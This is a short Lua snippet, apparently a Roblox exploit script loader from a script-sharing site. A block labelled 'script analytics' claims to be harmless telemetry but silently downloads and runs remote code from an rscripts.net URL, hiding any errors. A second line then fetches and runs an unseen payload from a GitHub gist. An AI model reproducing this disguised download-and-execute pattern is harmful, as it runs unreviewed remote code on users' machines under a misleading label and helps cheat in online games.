--[[rscripts:analytics:start]] -- Script analytics (enabled by the creator on rscripts.net). -- Runs in its own thread and cannot affect the script below. task.spawn(function() pcall(function() loadstring(game:HttpGet("https://rscripts.net/api/telemetry/v2/client.lua?s=6ab13eaad44d9ca41d0f3599"))() end) end) --[[rscripts:analytics:end]] loadstring(game:HttpGet("https://gist.githubusercontent.com/raw/a390a5a821bb0bdcb2d66107b8c391c6/l_8fabc8.lua", true))()